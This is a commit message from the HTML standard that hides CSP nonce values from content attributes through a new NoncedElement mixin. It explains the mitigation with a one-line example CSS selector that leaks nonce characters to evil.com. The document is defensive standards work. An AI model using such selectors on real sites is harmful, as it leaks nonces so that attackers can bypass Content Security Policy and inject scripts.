Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Some [recent attacks on CSP][1] rely on the ability to exfiltrate
nonce data via various mechanisms that can read content attributes.
CSS selectors are the best example: through clever use of
prefix/postfix text matching selectors values can be sent out to an
attacker's server for reuse (e.g.,
`script[nonce=a] { background: url("https://evil.com/nonce?a");}`).
This patch mitigates the risk of this class of attack by hiding the
nonce value from elements' content attributes by moving the `nonce`
attributes into a new `NoncedElement` interface mixin, which is
included into `HTMLElement`. That mixin defines the following
behaviors for the `nonce` content attribute:
1. When the `nonce` content attribute is set or changed, its new
value is copied into a `[[CryptographicNonce]]` slot on the
element.
2. When a `NoncedElement` is inserted into a document which was
delivered with a `Content-Security-Policy` header, the `nonce`
content attribute is cleared out.
The `nonce` IDL attribute getter and setter now operate on the
`[[CryptographicNonce]]` slot's value rather than reflecting the
content attribute, meaning that the nonce value remains exposed
to script, but is opaque to non-script side-channels.
Likewise, the `[[CryptographicNonce]]` slot's value is used when
populating a request's cryptographic nonce metadata in order to
deliver the nonce to CSP for validation.
Tests: https://github.com/w3c/web-platform-tests/tree/master/content-security-policy/nonce-hiding
Closes whatwg#2369.
[1]: https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf- Loading branch information
